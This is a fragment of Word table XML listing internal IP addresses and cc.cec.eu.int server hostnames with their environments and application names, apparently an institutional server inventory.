            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="25EC02C0" w14:textId="19C8ED6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8921F83" w14:textId="2CC53E1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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C6B47BC" w14:textId="4183718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1373DB7D" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7FCAD56E" w14:textId="68F1C24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10.130.139.43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6601D4FF" w14:textId="3FA388F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wlstd02295.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="25B58949" w14:textId="4C48785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4D7B2FC" w14:textId="6A32460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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="308E90F3" w14:textId="243121C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18C657E8" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="530A24BB" w14:textId="1DB8336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10.130.133.25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5500E5B7" w14:textId="236ACB6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wlstd03462.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4DCE2EA0" w14:textId="133E498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2C2C54A2" w14:textId="406069F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vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDFF023" w14:textId="794C61C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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="4347F60E" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1490F126" w14:textId="3E97F28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10.130.177.142</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F043AC" w14:textId="472FEC8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wlstd03452.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="13239338" w14:textId="5796727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0F9D6752" w14:textId="79DFA0A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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46EAD1F8" w14:textId="7CF216B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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="6595290A" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="24D74ACD" w14:textId="6640A45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10.130.135.72</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27E74BE8" w14:textId="178001F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wlstd03442.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0D3EB2BD" w14:textId="41B122B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A0C025B" w14:textId="56D38FC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Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B54FCFC" w14:textId="2E5F12E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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="1DC58B09" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="039AB163" w14:textId="58ECD83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10.130.140.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B79FC47" w14:textId="725D628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wlstd04188.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0BD79388" w14:textId="438D426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300D194" w14:textId="395BA50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147CF73F" w14:textId="399A87F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364449AD" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="252BA0FB" w14:textId="112FD4E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10.130.136.170</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76AA37AB" w14:textId="6093E7A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wlstd11321.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7F4DA645" w14:textId="1D3A7D8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9CE0A0D" w14:textId="6843778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2334EB76" w14:textId="6D8869A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4AD62E2F" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3A4BC272" w14:textId="730785B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10.130.139.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B0CCCE" w14:textId="15CB7B7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wlstd11318.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0C430B55" w14:textId="67EDAE4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3776F95" w14:textId="60F0ADA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6EC982F1" w14:textId="116EF10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0182E653" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="55629419" w14:textId="02A1E1F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10.130.139.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA39AB0" w14:textId="076F56D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wlstd02729.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0F86DE8D" w14:textId="2442DF2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B42E3A8" w14:textId="031674A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494606FB" w14:textId="6EDA061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133102E1" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="26D2FFFE" w14:textId="1765F5B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10.130.134.94</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CEA9535" w14:textId="41D86CC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wlstd02730.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="62C7D5C6" w14:textId="34770E4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06929C6F" w14:textId="4414889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32805FE2" w14:textId="7A00D66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001BDB01" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="09B5D733" w14:textId="3D90C13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10.130.180.214</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F2FA4FB" w14:textId="07B36EF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wlstd04187.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="508F6B0A" w14:textId="566C1F2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81ED9A4" w14:textId="2761087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5107DA91" w14:textId="4ADC1CD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CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="025B1988" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3FFEB3A8" w14:textId="7551CB0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10.130.181.240</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C466FD" w14:textId="200D799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wlstd04192.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0BDFA0B2" w14:textId="0CF3CEB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F939F9C" w14:textId="290A515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0E3AD9B8" w14:textId="4F5E4F5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03EC53E2" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7057D476" w14:textId="5DE78AA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10.130.134.110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="236E1A86" w14:textId="293EFC0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wlstd04204.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1E31E149" w14:textId="004E417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3ED1AC0A" w14:textId="1D248C9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65AB328B" w14:textId="33C35DF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0DCAD020" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="391928C6" w14:textId="16BF669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10.130.140.78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="615EE0CE" w14:textId="747EA1F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wlstd03382.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5D27DDF6" w14:textId="5533075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03B14E6D" w14:textId="7A9C66F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0B1BC51B" w14:textId="1A118B5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64B93031" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="06B4A67C" w14:textId="47D05A1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10.130.143.108</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B0D135B" w14:textId="153E00E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wlstd03381.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="550E288B" w14:textId="21AC7D0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41C6F8B2" w14:textId="5D7B0F7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481729DE" w14:textId="77F0B31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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="4511321E" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="193E8593" w14:textId="1F1E1CD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10.130.140.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F35B96" w14:textId="5B63A85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wlstd04188.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0A3C8E01" w14:textId="71454C2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69FDFD88" w14:textId="1B36392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5ED6CCEB" w14:textId="3FCCCA8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URA.EXTRACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="2151B843" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="561C6C7A" w14:textId="6146670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10.130.180.214</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB737F0" w14:textId="0E971C1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wlstd04187.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="06E562FD" w14:textId="0A8799D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672773A3" w14:textId="50206C3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4F8E8316" w14:textId="1169F49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URA.EXTRACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="572F6D53" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3F3EEACB" w14:textId="64EB9DC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10.130.140.59</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="191F3D5C" w14:textId="1B7A55E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wlstd03376.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="62155911" w14:textId="0F25719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0ACBF93" w14:textId="29133CE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7DDAD1FD" w14:textId="28D9497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EUCR.AUTHSERV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="209F0FAC" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1621A419" w14:textId="3E11EA5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10.130.138.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00B147A5" w14:textId="6BC2401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wlstd03375.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="657AD789" w14:textId="2A83BFA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2AB217E3" w14:textId="6806BC8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2D16F280" w14:textId="7CF05BB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EUCR.AUTHSERV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="2387CFFD" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="77BE3CFE" w14:textId="5058B54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10.130.130.222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69D26E24" w14:textId="23A122B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tmstd00513.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="36AC46BC" w14:textId="1B5CC8B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60E031C" w14:textId="34AB9CD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24C08CAE" w14:textId="2BFB535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MRV4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="67BDBE85" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4964E0B5" w14:textId="762FF15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10.130.129.141</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E99A597" w14:textId="5836CD0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wlstd11267.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="65A341D6" w14:textId="518D7DF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C0D74FB" w14:textId="0A226C5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2FBDD853" w14:textId="63BA3FE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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="177402EC" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="22EABA1B" w14:textId="284A4A1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10.130.143.107</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2086B3B6" w14:textId="3E0D650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wlstd11265.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="796D4331" w14:textId="3C25F98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3AE22B1F" w14:textId="43218EB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77EF6D02" w14:textId="23AF159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CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5BDBD8CD" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6B52AA97" w14:textId="4508D96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10.130.180.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B8C8932" w14:textId="21F2667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wlstd03803.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="75C9FF36" w14:textId="17E325A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50E99C06" w14:textId="6FB7B5E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10B70C34" w14:textId="0EDC260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EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="6EE2C171" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5FF18368" w14:textId="7F88183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10.130.130.139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072376F2" w14:textId="5D67533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wlstd02910.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6D058B1C" w14:textId="002887E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60F241A5" w14:textId="61509F8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57C3884C" w14:textId="2EAC127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UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5F32A4C6" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="100CC81D" w14:textId="23167FE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10.130.133.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C02C1DD" w14:textId="4F4B1FB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wlstd04185.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5F8F51EF" w14:textId="2DF29C0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061F7471" w14:textId="08B6956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4D4A64D6" w14:textId="1DF62B0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UR.COMMONSERVICES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="2A46B237" w14:textId="77777777" w:rsidTr="00035CD7">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="39BA88A2" w14:textId="31358D1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10.130.130.41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46B2F1EE" w14:textId="5565B41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wlstd02925.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
